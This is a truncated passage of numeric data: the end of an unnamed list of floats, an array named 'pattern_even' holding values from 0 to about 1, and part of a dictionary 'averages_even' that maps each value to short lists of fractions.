0.849365234375, 0.8505859375, 0.851318359375, 0.853271484375, 0.855224609375, 0.857177734375, 0.8583984375, 0.859130859375, 0.859375, 0.861083984375, 0.863037109375, 0.864990234375, 0.8662109375, 0.866943359375, 0.868896484375, 0.870849609375, 0.87109375, 0.872802734375, 0.8740234375, 0.874755859375, 0.875, 0.876708984375, 0.878662109375, 0.880615234375, 0.8818359375, 0.882568359375, 0.884521484375, 0.886474609375, 0.888427734375, 0.8896484375, 0.890380859375, 0.890625, 0.892333984375, 0.894287109375, 0.896240234375, 0.8974609375, 0.898193359375, 0.900146484375, 0.902099609375, 0.90234375, 0.904052734375, 0.9052734375, 0.906005859375, 0.90625, 0.907958984375, 0.909912109375, 0.911865234375, 0.9130859375, 0.913818359375, 0.915771484375, 0.917724609375, 0.919677734375, 0.9208984375, 0.921630859375, 0.921875, 0.923583984375, 0.925537109375, 0.927490234375, 0.9287109375, 0.929443359375, 0.931396484375, 0.933349609375, 0.93359375, 0.935302734375, 0.9365234375, 0.937255859375, 0.9375, 0.939208984375, 0.941162109375, 0.943115234375, 0.9443359375, 0.945068359375, 0.947021484375, 0.948974609375, 0.950927734375, 0.9521484375, 0.952880859375, 0.953125, 0.954833984375, 0.956787109375, 0.958740234375, 0.9599609375, 0.960693359375, 0.962646484375, 0.964599609375, 0.96484375, 0.966552734375, 0.9677734375, 0.968505859375, 0.96875, 0.970458984375, 0.972412109375, 0.974365234375, 0.9755859375, 0.976318359375, 0.978271484375, 0.980224609375, 0.982177734375, 0.9833984375, 0.984130859375, 0.984375, 0.986083984375, 0.988037109375, 0.989990234375, 0.9912109375, 0.991943359375, 0.993896484375, 0.995849609375, 0.99609375, 0.997802734375, 0.9990234375, 0.999755859375]
pattern_even=[0.0, 0.001708984375, 0.003662109375, 0.005615234375, 0.0068359375, 0.007568359375, 0.009521484375, 0.011474609375, 0.013427734375, 0.0146484375, 0.015380859375, 0.015625, 0.017333984375, 0.019287109375, 0.021240234375, 0.0224609375, 0.023193359375, 0.025146484375, 0.027099609375, 0.02734375, 0.029052734375, 0.0302734375, 0.031005859375, 0.03125, 0.032958984375, 0.034912109375, 0.036865234375, 0.0380859375, 0.038818359375, 0.040771484375, 0.042724609375, 0.044677734375, 0.0458984375, 0.046630859375, 0.046875, 0.048583984375, 0.050537109375, 0.052490234375, 0.0537109375, 0.054443359375, 0.056396484375, 0.058349609375, 0.05859375, 0.060302734375, 0.0615234375, 0.062255859375, 0.0625, 0.064208984375, 0.066162109375, 0.068115234375, 0.0693359375, 0.070068359375, 0.072021484375, 0.073974609375, 0.075927734375, 0.0771484375, 0.077880859375, 0.078125, 0.079833984375, 0.081787109375, 0.083740234375, 0.0849609375, 0.085693359375, 0.087646484375, 0.089599609375, 0.08984375, 0.091552734375, 0.0927734375, 0.093505859375, 0.09375, 0.095458984375, 0.097412109375, 0.099365234375, 0.1005859375, 0.101318359375, 0.103271484375, 0.105224609375, 0.107177734375, 0.1083984375, 0.109130859375, 0.109375, 0.111083984375, 0.113037109375, 0.114990234375, 0.1162109375, 0.116943359375, 0.118896484375, 0.120849609375, 0.12109375, 0.122802734375, 0.1240234375, 0.124755859375, 0.125, 0.126708984375, 0.128662109375, 0.130615234375, 0.1318359375, 0.132568359375, 0.134521484375, 0.136474609375, 0.138427734375, 0.1396484375, 0.140380859375, 0.140625, 0.142333984375, 0.144287109375, 0.146240234375, 0.1474609375, 0.148193359375, 0.150146484375, 0.152099609375, 0.15234375, 0.154052734375, 0.1552734375, 0.156005859375, 0.15625, 0.157958984375, 0.159912109375, 0.161865234375, 0.1630859375, 0.163818359375, 0.165771484375, 0.167724609375, 0.169677734375, 0.1708984375, 0.171630859375, 0.171875, 0.173583984375, 0.175537109375, 0.177490234375, 0.1787109375, 0.179443359375, 0.181396484375, 0.183349609375, 0.18359375, 0.185302734375, 0.1865234375, 0.187255859375, 0.1875, 0.189208984375, 0.191162109375, 0.193115234375, 0.1943359375, 0.195068359375, 0.197021484375, 0.198974609375, 0.200927734375, 0.2021484375, 0.202880859375, 0.203125, 0.204833984375, 0.206787109375, 0.208740234375, 0.2099609375, 0.210693359375, 0.212646484375, 0.214599609375, 0.21484375, 0.216552734375, 0.2177734375, 0.218505859375, 0.21875, 0.220458984375, 0.222412109375, 0.224365234375, 0.2255859375, 0.226318359375, 0.228271484375, 0.230224609375, 0.232177734375, 0.2333984375, 0.234130859375, 0.234375, 0.236083984375, 0.238037109375, 0.239990234375, 0.2412109375, 0.241943359375, 0.243896484375, 0.245849609375, 0.24609375, 0.247802734375, 0.2490234375, 0.249755859375, 0.25, 0.251708984375, 0.253662109375, 0.255615234375, 0.2568359375, 0.257568359375, 0.259521484375, 0.261474609375, 0.263427734375, 0.2646484375, 0.265380859375, 0.265625, 0.267333984375, 0.269287109375, 0.271240234375, 0.2724609375, 0.273193359375, 0.275146484375, 0.277099609375, 0.27734375, 0.279052734375, 0.2802734375, 0.281005859375, 0.28125, 0.282958984375, 0.284912109375, 0.286865234375, 0.2880859375, 0.288818359375, 0.290771484375, 0.292724609375, 0.294677734375, 0.2958984375, 0.296630859375, 0.296875, 0.298583984375, 0.300537109375, 0.302490234375, 0.3037109375, 0.304443359375, 0.306396484375, 0.308349609375, 0.30859375, 0.310302734375, 0.3115234375, 0.312255859375, 0.3125, 0.314208984375, 0.316162109375, 0.318115234375, 0.3193359375, 0.320068359375, 0.322021484375, 0.323974609375, 0.325927734375, 0.3271484375, 0.327880859375, 0.328125, 0.329833984375, 0.331787109375, 0.333740234375, 0.3349609375, 0.335693359375, 0.337646484375, 0.339599609375, 0.33984375, 0.341552734375, 0.3427734375, 0.343505859375, 0.34375, 0.345458984375, 0.347412109375, 0.349365234375, 0.3505859375, 0.351318359375, 0.353271484375, 0.355224609375, 0.357177734375, 0.3583984375, 0.359130859375, 0.359375, 0.361083984375, 0.363037109375, 0.364990234375, 0.3662109375, 0.366943359375, 0.368896484375, 0.370849609375, 0.37109375, 0.372802734375, 0.3740234375, 0.374755859375, 0.375, 0.376708984375, 0.378662109375, 0.380615234375, 0.3818359375, 0.382568359375, 0.384521484375, 0.386474609375, 0.388427734375, 0.3896484375, 0.390380859375, 0.390625, 0.392333984375, 0.394287109375, 0.396240234375, 0.3974609375, 0.398193359375, 0.400146484375, 0.402099609375, 0.40234375, 0.404052734375, 0.4052734375, 0.406005859375, 0.40625, 0.407958984375, 0.409912109375, 0.411865234375, 0.4130859375, 0.413818359375, 0.415771484375, 0.417724609375, 0.419677734375, 0.4208984375, 0.421630859375, 0.421875, 0.423583984375, 0.425537109375, 0.427490234375, 0.4287109375, 0.429443359375, 0.431396484375, 0.433349609375, 0.43359375, 0.435302734375, 0.4365234375, 0.437255859375, 0.4375, 0.439208984375, 0.441162109375, 0.443115234375, 0.4443359375, 0.445068359375, 0.447021484375, 0.448974609375, 0.450927734375, 0.4521484375, 0.452880859375, 0.453125, 0.454833984375, 0.456787109375, 0.458740234375, 0.4599609375, 0.460693359375, 0.462646484375, 0.464599609375, 0.46484375, 0.466552734375, 0.4677734375, 0.468505859375, 0.46875, 0.470458984375, 0.472412109375, 0.474365234375, 0.4755859375, 0.476318359375, 0.478271484375, 0.480224609375, 0.482177734375, 0.4833984375, 0.484130859375, 0.484375, 0.486083984375, 0.488037109375, 0.489990234375, 0.4912109375, 0.491943359375, 0.493896484375, 0.495849609375, 0.49609375, 0.497802734375, 0.4990234375, 0.499755859375, 0.5, 0.501708984375, 0.503662109375, 0.505615234375, 0.5068359375, 0.507568359375, 0.509521484375, 0.511474609375, 0.513427734375, 0.5146484375, 0.515380859375, 0.515625, 0.517333984375, 0.519287109375, 0.521240234375, 0.5224609375, 0.523193359375, 0.525146484375, 0.527099609375, 0.52734375, 0.529052734375, 0.5302734375, 0.531005859375, 0.53125, 0.532958984375, 0.534912109375, 0.536865234375, 0.5380859375, 0.538818359375, 0.540771484375, 0.542724609375, 0.544677734375, 0.5458984375, 0.546630859375, 0.546875, 0.548583984375, 0.550537109375, 0.552490234375, 0.5537109375, 0.554443359375, 0.556396484375, 0.558349609375, 0.55859375, 0.560302734375, 0.5615234375, 0.562255859375, 0.5625, 0.564208984375, 0.566162109375, 0.568115234375, 0.5693359375, 0.570068359375, 0.572021484375, 0.573974609375, 0.575927734375, 0.5771484375, 0.577880859375, 0.578125, 0.579833984375, 0.581787109375, 0.583740234375, 0.5849609375, 0.585693359375, 0.587646484375, 0.589599609375, 0.58984375, 0.591552734375, 0.5927734375, 0.593505859375, 0.59375, 0.595458984375, 0.597412109375, 0.599365234375, 0.6005859375, 0.601318359375, 0.603271484375, 0.605224609375, 0.607177734375, 0.6083984375, 0.609130859375, 0.609375, 0.611083984375, 0.613037109375, 0.614990234375, 0.6162109375, 0.616943359375, 0.618896484375, 0.620849609375, 0.62109375, 0.622802734375, 0.6240234375, 0.624755859375, 0.625, 0.626708984375, 0.628662109375, 0.630615234375, 0.6318359375, 0.632568359375, 0.634521484375, 0.636474609375, 0.638427734375, 0.6396484375, 0.640380859375, 0.640625, 0.642333984375, 0.644287109375, 0.646240234375, 0.6474609375, 0.648193359375, 0.650146484375, 0.652099609375, 0.65234375, 0.654052734375, 0.6552734375, 0.656005859375, 0.65625, 0.657958984375, 0.659912109375, 0.661865234375, 0.6630859375, 0.663818359375, 0.665771484375, 0.667724609375, 0.669677734375, 0.6708984375, 0.671630859375, 0.671875, 0.673583984375, 0.675537109375, 0.677490234375, 0.6787109375, 0.679443359375, 0.681396484375, 0.683349609375, 0.68359375, 0.685302734375, 0.6865234375, 0.687255859375, 0.6875, 0.689208984375, 0.691162109375, 0.693115234375, 0.6943359375, 0.695068359375, 0.697021484375, 0.698974609375, 0.700927734375, 0.7021484375, 0.702880859375, 0.703125, 0.704833984375, 0.706787109375, 0.708740234375, 0.7099609375, 0.710693359375, 0.712646484375, 0.714599609375, 0.71484375, 0.716552734375, 0.7177734375, 0.718505859375, 0.71875, 0.720458984375, 0.722412109375, 0.724365234375, 0.7255859375, 0.726318359375, 0.728271484375, 0.730224609375, 0.732177734375, 0.7333984375, 0.734130859375, 0.734375, 0.736083984375, 0.738037109375, 0.739990234375, 0.7412109375, 0.741943359375, 0.743896484375, 0.745849609375, 0.74609375, 0.747802734375, 0.7490234375, 0.749755859375, 0.75, 0.751708984375, 0.753662109375, 0.755615234375, 0.7568359375, 0.757568359375, 0.759521484375, 0.761474609375, 0.763427734375, 0.7646484375, 0.765380859375, 0.765625, 0.767333984375, 0.769287109375, 0.771240234375, 0.7724609375, 0.773193359375, 0.775146484375, 0.777099609375, 0.77734375, 0.779052734375, 0.7802734375, 0.781005859375, 0.78125, 0.782958984375, 0.784912109375, 0.786865234375, 0.7880859375, 0.788818359375, 0.790771484375, 0.792724609375, 0.794677734375, 0.7958984375, 0.796630859375, 0.796875, 0.798583984375, 0.800537109375, 0.802490234375, 0.8037109375, 0.804443359375, 0.806396484375, 0.808349609375, 0.80859375, 0.810302734375, 0.8115234375, 0.812255859375, 0.8125, 0.814208984375, 0.816162109375, 0.818115234375, 0.8193359375, 0.820068359375, 0.822021484375, 0.823974609375, 0.825927734375, 0.8271484375, 0.827880859375, 0.828125, 0.829833984375, 0.831787109375, 0.833740234375, 0.8349609375, 0.835693359375, 0.837646484375, 0.839599609375, 0.83984375, 0.841552734375, 0.8427734375, 0.843505859375, 0.84375, 0.845458984375, 0.847412109375, 0.849365234375, 0.8505859375, 0.851318359375, 0.853271484375, 0.855224609375, 0.857177734375, 0.8583984375, 0.859130859375, 0.859375, 0.861083984375, 0.863037109375, 0.864990234375, 0.8662109375, 0.866943359375, 0.868896484375, 0.870849609375, 0.87109375, 0.872802734375, 0.8740234375, 0.874755859375, 0.875, 0.876708984375, 0.878662109375, 0.880615234375, 0.8818359375, 0.882568359375, 0.884521484375, 0.886474609375, 0.888427734375, 0.8896484375, 0.890380859375, 0.890625, 0.892333984375, 0.894287109375, 0.896240234375, 0.8974609375, 0.898193359375, 0.900146484375, 0.902099609375, 0.90234375, 0.904052734375, 0.9052734375, 0.906005859375, 0.90625, 0.907958984375, 0.909912109375, 0.911865234375, 0.9130859375, 0.913818359375, 0.915771484375, 0.917724609375, 0.919677734375, 0.9208984375, 0.921630859375, 0.921875, 0.923583984375, 0.925537109375, 0.927490234375, 0.9287109375, 0.929443359375, 0.931396484375, 0.933349609375, 0.93359375, 0.935302734375, 0.9365234375, 0.937255859375, 0.9375, 0.939208984375, 0.941162109375, 0.943115234375, 0.9443359375, 0.945068359375, 0.947021484375, 0.948974609375, 0.950927734375, 0.9521484375, 0.952880859375, 0.953125, 0.954833984375, 0.956787109375, 0.958740234375, 0.9599609375, 0.960693359375, 0.962646484375, 0.964599609375, 0.96484375, 0.966552734375, 0.9677734375, 0.968505859375, 0.96875, 0.970458984375, 0.972412109375, 0.974365234375, 0.9755859375, 0.976318359375, 0.978271484375, 0.980224609375, 0.982177734375, 0.9833984375, 0.984130859375, 0.984375, 0.986083984375, 0.988037109375, 0.989990234375, 0.9912109375, 0.991943359375, 0.993896484375, 0.995849609375, 0.99609375, 0.997802734375, 0.9990234375, 0.999755859375]
averages_even={0.0: [0.25, 0.5, 0.75, 0.0], 0.001708984375: [0.328125, 0.671875], 0.216552734375: [0.453125, 0.546875], 0.974365234375: [0.796875, 0.203125], 0.0068359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.029052734375: [0.453125, 0.546875], 0.505615234375: [0.796875, 0.203125], 0.0693359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.681396484375: [0.421875, 0.578125], 0.425537109375: [0.390625, 0.609375], 0.732177734375: [0.953125, 0.046875], 0.892333984375: [0.828125, 0.171875], 0.5380859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.915771484375: [0.921875, 0.078125], 0.5: [0.5, 0.75, 0.0, 0.25], 0.4208984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.800537109375: [0.390625, 0.609375], 0.595458984375: [0.671875, 0.328125], 0.493896484375: [0.421875, 0.578125], 0.052490234375: [0.296875, 0.703125], 0.966552734375: [0.453125, 0.546875], 0.558349609375: [0.859375, 0.140625], 0.007568359375: [0.265625, 0.734375], 0.937255859375: [0.484375, 0.515625], 0.372802734375: [0.453125, 0.546875], 0.148193359375: [0.234375, 0.765625], 0.568115234375: [0.796875, 0.203125], 0.8115234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.695068359375: [0.734375, 0.265625], 0.65625: [0.5, 0.75, 0.0, 0.25], 0.251708984375: [0.328125, 0.671875], 0.441162109375: [0.890625, 0.109375], 0.40234375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.154052734375: [0.453125, 0.546875], 0.081787109375: [0.390625, 0.609375], 0.650146484375: [0.421875, 0.578125], 0.5693359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.5302734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.4365234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.831787109375: [0.390625, 0.609375], 0.320068359375: [0.265625, 0.734375], 0.28125: [0.25, 0.5, 0.75, 0.0], 0.7802734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.625: [0.5, 0.75, 0.0, 0.25], 0.054443359375: [0.234375, 0.765625], 0.589599609375: [0.859375, 0.140625], 0.968505859375: [0.484375, 0.515625], 0.388427734375: [0.953125, 0.046875], 0.156005859375: [0.484375, 0.515625], 0.8427734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.507568359375: [0.734375, 0.265625], 0.0771484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.267333984375: [0.828125, 0.171875], 0.456787109375: [0.390625, 0.609375], 0.794677734375: [0.953125, 0.046875], 0.085693359375: [0.765625, 0.234375], 0.6005859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.53125: [0.5, 0.75, 0.0, 0.25], 0.24609375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.4521484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.863037109375: [0.390625, 0.609375], 0.335693359375: [0.765625, 0.234375], 0.296875: [0.375, 0.625, 0.875, 0.125], 0.552490234375: [0.703125, 0.296875], 0.224365234375: [0.796875, 0.203125], 0.620849609375: [0.859375, 0.140625], 0.1240234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.999755859375: [0.484375, 0.515625], 0.404052734375: [0.453125, 0.546875], 0.163818359375: [0.265625, 0.734375], 0.759521484375: [0.921875, 0.078125], 0.125: [0.25, 0.5, 0.75, 0.0], 0.8740234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.757568359375: [0.734375, 0.265625], 0.71875: [0.5, 0.75, 0.0, 0.25], 0.282958984375: [0.328125, 0.671875], 0.015380859375: [0.984375, 0.015625], 0.825927734375: [0.953125, 0.046875], 0.089599609375: [0.859375, 0.140625], 0.407958984375: [0.328125, 0.671875], 0.4677734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.894287109375: [0.390625, 0.609375], 0.351318359375: [0.734375, 0.265625], 0.3125: [0.25, 0.5, 0.75, 0.0], 0.583740234375: [0.703125, 0.296875], 0.665771484375: [0.921875, 0.078125], 0.232177734375: [0.953125, 0.046875], 0.017333984375: [0.828125, 0.171875], 0.652099609375: [0.859375, 0.140625], 0.814208984375: [0.671875, 0.328125], 0.419677734375: [0.953125, 0.046875], 0.171630859375: [0.984375, 0.015625], 0.9052734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.509521484375: [0.921875, 0.078125], 0.0849609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.009521484375: [0.921875, 0.078125], 0.736083984375: [0.828125, 0.171875], 0.488037109375: [0.390625, 0.609375], 0.857177734375: [0.953125, 0.046875], 0.093505859375: [0.484375, 0.515625], 0.236083984375: [0.828125, 0.171875], 0.6630859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.546630859375: [0.984375, 0.015625], 0.4833984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.925537109375: [0.390625, 0.609375], 0.208740234375: [0.296875, 0.703125], 0.328125: [0.375, 0.625, 0.875, 0.125], 0.614990234375: [0.296875, 0.703125], 0.048583984375: [0.828125, 0.171875], 0.239990234375: [0.296875, 0.703125], 0.683349609375: [0.859375, 0.140625], 0.572021484375: [0.921875, 0.078125], 0.806396484375: [0.421875, 0.578125], 0.435302734375: [0.453125, 0.546875], 0.179443359375: [0.765625, 0.234375], 0.140625: [0.375, 0.625, 0.875, 0.125], 0.9365234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.820068359375: [0.734375, 0.265625], 0.78125: [0.5, 0.75, 0.0, 0.25], 0.314208984375: [0.328125, 0.671875], 0.46484375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.0537109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.097412109375: [0.890625, 0.109375], 0.6943359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.577880859375: [0.984375, 0.015625], 0.566162109375: [0.890625, 0.109375], 0.4990234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.956787109375: [0.390625, 0.609375], 0.382568359375: [0.734375, 0.265625], 0.34375: [0.5, 0.75, 0.0, 0.25], 0.646240234375: [0.703125, 0.296875], 0.626708984375: [0.328125, 0.671875], 0.247802734375: [0.453125, 0.546875], 0.714599609375: [0.859375, 0.140625], 0.261474609375: [0.359375, 0.640625], 0.02734375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.7568359375: [0.65625, 0.84375, 0.15625, 0.34375], 0.450927734375: [0.953125, 0.046875], 0.187255859375: [0.484375, 0.515625], 0.2568359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.0458984375: [0.21875, 0.28125, 0.71875, 0.78125], 0.9677734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.511474609375: [0.359375, 0.640625], 0.0927734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.329833984375: [0.828125, 0.171875], 0.126708984375: [0.328125, 0.671875], 0.919677734375: [0.953125, 0.046875], 0.101318359375: [0.265625, 0.734375], 0.161865234375: [0.796875, 0.203125], 0.7255859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.609130859375: [0.984375, 0.015625], 0.0625: [0.25, 0.5, 0.75, 0.0], 0.579833984375: [0.828125, 0.171875], 0.988037109375: [0.390625, 0.609375], 0.398193359375: [0.765625, 0.234375], 0.359375: [0.375, 0.625, 0.875, 0.125], 0.677490234375: [0.703125, 0.296875], 0.745849609375: [0.859375, 0.140625], 0.277099609375: [0.859375, 0.140625], 0.466552734375: [0.453125, 0.546875], 0.195068359375: [0.265625, 0.734375], 0.15625: [0.25, 0.5, 0.75, 0.0], 0.2724609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.822021484375: [0.921875, 0.078125], 0.9990234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.882568359375: [0.734375, 0.265625], 0.84375: [0.5, 0.75, 0.0, 0.25], 0.345458984375: [0.328125, 0.671875], 0.134521484375: [0.921875, 0.078125], 0.49609375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.950927734375: [0.953125, 0.046875], 0.105224609375: [0.359375, 0.640625], 0.363037109375: [0.390625, 0.609375], 0.640380859375: [0.984375, 0.015625], 0.413818359375: [0.734375, 0.265625], 0.375: [0.5, 0.75, 0.0, 0.25], 0.708740234375: [0.703125, 0.296875], 0.763427734375: [0.953125, 0.046875], 0.777099609375: [0.859375, 0.140625], 0.292724609375: [0.359375, 0.640625], 0.43359375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.482177734375: [0.953125, 0.046875], 0.202880859375: [0.984375, 0.015625], 0.790771484375: [0.921875, 0.078125], 0.534912109375: [0.890625, 0.109375], 0.663818359375: [0.734375, 0.265625], 0.513427734375: [0.953125, 0.046875], 0.1005859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.361083984375: [0.828125, 0.171875], 0.603271484375: [0.921875, 0.078125], 0.0615234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.109130859375: [0.984375, 0.015625], 0.7880859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.671630859375: [0.984375, 0.015625], 0.429443359375: [0.765625, 0.234375], 0.390625: [0.375, 0.625, 0.875, 0.125], 0.739990234375: [0.703125, 0.296875], 0.5458984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.808349609375: [0.859375, 0.140625], 0.845458984375: [0.671875, 0.328125], 0.077880859375: [0.984375, 0.015625], 0.861083984375: [0.828125, 0.171875], 0.497802734375: [0.453125, 0.546875], 0.210693359375: [0.234375, 0.765625], 0.3037109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.548583984375: [0.828125, 0.171875], 0.945068359375: [0.734375, 0.265625], 0.90625: [0.5, 0.75, 0.0, 0.25], 0.376708984375: [0.328125, 0.671875], 0.150146484375: [0.421875, 0.578125], 0.113037109375: [0.390625, 0.609375], 0.8193359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.5068359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.255615234375: [0.796875, 0.203125], 0.445068359375: [0.265625, 0.734375], 0.40625: [0.5, 0.75, 0.0, 0.25], 0.771240234375: [0.703125, 0.296875], 0.900146484375: [0.421875, 0.578125], 0.5771484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.839599609375: [0.859375, 0.140625], 0.323974609375: [0.359375, 0.640625], 0.913818359375: [0.734375, 0.265625], 0.875: [0.5, 0.75, 0.0, 0.25], 0.218505859375: [0.484375, 0.515625], 0.3193359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.597412109375: [0.890625, 0.109375], 0.55859375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.515380859375: [0.984375, 0.015625], 0.9375: [0.5, 0.75, 0.0, 0.25], 0.392333984375: [0.828125, 0.171875], 0.157958984375: [0.328125, 0.671875], 0.116943359375: [0.234375, 0.765625], 0.8505859375: [0.65625, 0.84375, 0.15625, 0.34375], 0.734130859375: [0.984375, 0.015625], 0.078125: [0.375, 0.625, 0.875, 0.125], 0.954833984375: [0.828125, 0.171875], 0.634521484375: [0.921875, 0.078125], 0.460693359375: [0.765625, 0.234375], 0.421875: [0.375, 0.625, 0.875, 0.125], 0.802490234375: [0.703125, 0.296875], 0.6083984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.870849609375: [0.859375, 0.140625], 0.339599609375: [0.859375, 0.140625], 0.982177734375: [0.953125, 0.046875], 0.560302734375: [0.453125, 0.546875], 0.09375: [0.25, 0.5, 0.75, 0.0], 0.226318359375: [0.265625, 0.734375], 0.1875: [0.25, 0.5, 0.75, 0.0], 0.021240234375: [0.296875, 0.703125], 0.628662109375: [0.890625, 0.109375], 0.58984375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.704833984375: [0.828125, 0.171875], 0.96875: [0.5, 0.75, 0.0, 0.25], 0.165771484375: [0.921875, 0.078125], 0.120849609375: [0.859375, 0.140625], 0.271240234375: [0.296875, 0.703125], 0.169677734375: [0.953125, 0.046875], 0.286865234375: [0.796875, 0.203125], 0.046630859375: [0.984375, 0.015625], 0.476318359375: [0.734375, 0.265625], 0.4375: [0.5, 0.75, 0.0, 0.25], 0.833740234375: [0.703125, 0.296875], 0.6396484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.6875: [0.5, 0.75, 0.0, 0.25], 0.902099609375: [0.859375, 0.140625], 0.355224609375: [0.359375, 0.640625], 0.591552734375: [0.453125, 0.546875], 0.234130859375: [0.984375, 0.015625], 0.3505859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.659912109375: [0.890625, 0.109375], 0.62109375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.517333984375: [0.828125, 0.171875], 0.1162109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.013427734375: [0.953125, 0.046875], 0.173583984375: [0.828125, 0.171875], 0.767333984375: [0.828125, 0.171875], 0.124755859375: [0.484375, 0.515625], 0.245849609375: [0.859375, 0.140625], 0.9130859375: [0.65625, 0.84375, 0.15625, 0.34375], 0.796630859375: [0.984375, 0.015625], 0.302490234375: [0.296875, 0.703125], 0.491943359375: [0.765625, 0.234375], 0.453125: [0.375, 0.625, 0.875, 0.125], 0.864990234375: [0.703125, 0.296875], 0.6708984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.554443359375: [0.765625, 0.234375], 0.933349609375: [0.859375, 0.140625], 0.370849609375: [0.859375, 0.140625], 0.622802734375: [0.453125, 0.546875], 0.064208984375: [0.328125, 0.671875], 0.005615234375: [0.796875, 0.203125], 0.241943359375: [0.765625, 0.234375], 0.203125: [0.375, 0.625, 0.875, 0.125], 0.3662109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.691162109375: [0.890625, 0.109375], 0.65234375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.962646484375: [0.421875, 0.578125], 0.439208984375: [0.328125, 0.671875], 0.181396484375: [0.421875, 0.578125], 0.015625: [0.375, 0.625, 0.875, 0.125], 0.796875: [0.375, 0.625, 0.875, 0.125], 0.21484375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.9443359375: [0.65625, 0.84375, 0.15625, 0.34375], 0.827880859375: [0.984375, 0.015625], 0.08984375: [0.1875, 0.3125, 0.6875, 0.9375, 0.0625, 0.4375, 0.5625, 0.8125], 0.318115234375: [0.796875, 0.203125], 0.538818359375: [0.734375, 0.265625], 0.6552734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.986083984375: [0.828125, 0.171875], 0.46875: [0.5, 0.75, 0.0, 0.25], 0.896240234375: [0.703125, 0.296875], 0.7021484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.585693359375: [0.765625, 0.234375], 0.546875: [0.375, 0.625, 0.875, 0.125], 0.964599609375: [0.859375, 0.140625], 0.386474609375: [0.359375, 0.640625], 0.654052734375: [0.453125, 0.546875], 0.068115234375: [0.796875, 0.203125], 0.618896484375: [0.421875, 0.578125], 0.4052734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.019287109375: [0.390625, 0.609375], 0.249755859375: [0.484375, 0.515625], 0.3818359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.722412109375: [0.890625, 0.109375], 0.68359375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.265380859375: [0.984375, 0.015625], 0.519287109375: [0.390625, 0.609375], 0.454833984375: [0.828125, 0.171875], 0.189208984375: [0.328125, 0.671875], 0.9755859375: [0.65625, 0.84375, 0.15625, 0.34375], 0.859130859375: [0.984375, 0.015625], 0.333740234375: [0.296875, 0.703125], 0.128662109375: [0.890625, 0.109375], 0.689208984375: [0.671875, 0.328125], 0.484375: [0.375, 0.625, 0.875, 0.125], 0.927490234375: [0.703125, 0.296875], 0.056396484375: [0.421875, 0.578125], 0.7333984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.616943359375: [0.765625, 0.234375], 0.578125: [0.375, 0.625, 0.875, 0.125], 0.995849609375: [0.859375, 0.140625], 0.402099609375: [0.859375, 0.140625], 0.685302734375: [0.453125, 0.546875], 0.072021484375: [0.921875, 0.078125], 0.1083984375: [0.21875, 0.28125, 0.71875, 0.78125], 0.21875: [0.25, 0.5, 0.75, 0.0], 0.3974609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.753662109375: [0.890625, 0.109375], 0.71484375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 